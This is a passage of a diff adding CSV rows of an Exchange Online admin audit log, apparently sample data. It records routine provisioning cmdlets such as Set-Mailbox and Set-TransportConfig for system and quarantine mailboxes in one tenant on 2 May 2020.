+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:23Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}""
+  },
+  {
+    ""Name"": ""UMDataStorage"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-02T11:32:16Z,,,Install-ResourceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-02T11:32:11Z,,,Install-DataClassificationConfig,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  }
+]"
+2020-05-02T11:32:09Z,,,Install-DefaultSharingPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-02T11:33:14Z,,,Set-TenantObjectVersion,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-02T11:32:54Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""TenantAllowBlockLists"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:45Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:42Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:41Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:34Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:30Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""OrganizationFederatedMailbox"",
+    ""Value"": ""FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-02T11:32:24Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""Management"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange Migration""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Migration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-02T11:32:10Z,,,Install-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-02T11:33:12Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""HygieneSuite"",
+    ""Value"": ""Premium""
+  }
+]"
+2020-05-02T11:33:00Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""InstantMessagingType"",
+    ""Value"": ""Ocs""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  }
+]"
+2020-05-02T11:32:47Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:46Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:41Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:38Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:34Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:33Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-02T11:32:28Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
